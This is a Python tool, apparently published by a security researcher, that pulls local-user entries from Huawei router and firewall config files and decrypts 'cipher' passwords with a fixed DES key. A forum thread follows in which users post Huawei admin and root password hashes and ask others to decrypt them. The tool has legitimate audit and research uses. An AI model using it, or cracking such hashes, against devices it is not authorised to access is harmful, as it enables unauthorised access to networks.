#!/usr/bin/python
"""
Simple tool to extract local users and passwords from most Huawei routers/firewalls config files.
Will extract plain-text passwords and encrypted credentials. Huawei config files use DES encryption with
a known key. Using this information, the script will decrypt credentials found in the config file.
Author: Etienne Stalmans (etienne@sensepost.com)
Version: 1.0 (12/01/2014)
"""
import binascii
import sys

from Crypto.Cipher import DES
def decode_char(c):
    """Return the numeric value of one character of an encoded field.

    The value is the character's offset from '!'. The letter 'a' is an
    alias for '?' and decodes to the same value.

    Args:
        c: A single character taken from the encoded string.

    Returns:
        ``ord(c) - ord('!')`` as an int, with 'a' treated as '?'.
    """
    # 'a' stands in for '?' in the encoded alphabet; every other character
    # is used as-is.
    symbol = '?' if c == 'a' else c
    return ord(symbol) - ord('!')
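def ascii_to_binary(s):
    """Decode a 24-character encoded field into its 18 raw bytes.

    Each group of four characters is mapped through decode_char() and the
    four values are packed, six bits apiece and most significant first,
    into three output bytes.

    Args:
        s: The encoded string; must be exactly 24 characters long.

    Returns:
        An 18-byte byte string (``str`` on Python 2, ``bytes`` on Python 3).

    Raises:
        ValueError: If ``s`` is not exactly 24 characters long.
    """
    # Explicit check rather than ``assert``: assertions are stripped under
    # ``python -O``, which would let malformed input reach the indexing below.
    if len(s) != 24:
        raise ValueError(
            "expected a 24-character encoded string, got %d characters" % len(s))

    out = bytearray()
    for i in range(0, len(s), 4):
        y = 0
        for c in s[i:i + 4]:
            # Shift in six bits per character; the mask keeps the
            # accumulator at 24 bits even for out-of-alphabet characters.
            y = ((y << 6) | decode_char(c)) & 0xffffff
        # Emit the 24-bit group most significant byte first.
        out.append((y >> 16) & 0xff)
        out.append((y >> 8) & 0xff)
        out.append(y & 0xff)
    return bytes(out)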
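def decrypt_password(p):
    """Recover the cleartext of a ``cipher``-type password field.

    The field is decoded with ascii_to_binary(), the first 16 decoded bytes
    are decrypted with single DES in ECB mode under a fixed key, and
    trailing NUL bytes are stripped from the result.

    Because the key is a constant, a ``cipher`` value is reversible by
    anyone who holds the configuration file. Config exports and backups
    containing such entries should be handled as if they held cleartext
    passwords.

    Args:
        p: The encoded password string from the config line.

    Returns:
        The decrypted password as ``str``.

    Raises:
        Whatever ascii_to_binary() raises for a field that is not in the
        expected 24-character form.
    """
    # Byte-string literals are identical to the original ``str`` literals
    # on Python 2 and are accepted by the DES API on Python 3.
    key = b"\x01\x02\x03\x04\x05\x06\x07\x08"

    raw = ascii_to_binary(p)
    if not isinstance(raw, bytes):
        # A text string of code points 0-255 maps 1:1 to bytes via latin-1.
        raw = raw.encode("latin-1")
    # Only the first 16 of the 18 decoded bytes are fed to the cipher.
    raw = raw[:16]

    plain = DES.new(key, DES.MODE_ECB).decrypt(raw).rstrip(b"\x00")
    if isinstance(plain, str):
        # Python 2: bytes is str, return unchanged as the original did.
        return plain
    return plain.decode("latin-1")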
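# Entry script: scan a config file for ``local-user ... password ...`` lines
# and report each credential, decrypting ``cipher`` entries.
if len(sys.argv) < 2:
    # Fail with a usage message instead of an IndexError traceback.
    sys.exit("Usage: %s <config-file>" % sys.argv[0])

print("[*] Huawei Password Decryptor")
# ``with`` guarantees the config file is closed even if a line fails to parse.
with open(sys.argv[1], 'r') as f_in:
    for line in f_in:
        if ('local-user' not in line) or ('password' not in line):
            continue
        inp = line.split()
        # Fields are read by position (name at 1, type at 3, value at 4).
        # Lines with fewer tokens cannot be reported and would otherwise
        # raise IndexError.
        if len(inp) < 5:
            continue
        print("[*]-----------------------")
        print("\t[+] User: %s" % inp[1])
        print("\t[+] Password type: %s" % inp[3])
        if inp[3] == "cipher":
            print("\t[+] Cipher: %s" % inp[4])
            try:
                print("\t[+] Password: %s" % decrypt_password(inp[4]))
            except (AssertionError, ValueError) as err:
                # ascii_to_binary rejects values that are not exactly 24
                # characters long; report that and carry on with the rest
                # of the file.
                print("\t[-] Could not decode cipher value: %s" % err)
        elif inp[3] == "irreversible-cipher":
            # The keyword indicates a one-way value and this tool makes no
            # attempt to recover it; label it so the stored value is not
            # mistaken for a usable password.
            print("\t[+] Irreversible value (not decrypted): %s" % inp[4])
        else:
            print("\t[+] Password: %s" % (inp[4]))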
Hi guys, has anyone tested encryption and decryption on Huawei AX2 WiFi 6 routers? It seems the user is always the same: admin, with just a password on the login screen. I have managed to analyze the network traffic with F12, and there are 2 requests: user_login_nonce, and user_login_proof which returns an RSAE : 010001, an RSA_N public modulus, an RSA signature and server signature keys, together with CSRF tokens for security protection. In the user_login_nonce request the password seems to be encrypted, and we can only see SALT key info.
hello, can anyone decrypt this?
local-user admin password irreversible-cipher $1c$xkWr)4aqh7$-)UV=T].KVW+B{Wg&JdD6tc.Nn</N1lsZWA$ysy5$
thanks
hello, can anyone decrypt this?
local-user root password irreversible-cipher g-1CeT32Y$..R"-F[fW<;W15,m-yn>.Y.-J>{wC@@
Q|,!+Q&G$
can anyone decrypt that:
Hi there! Any reason you're not decrypting it yourself?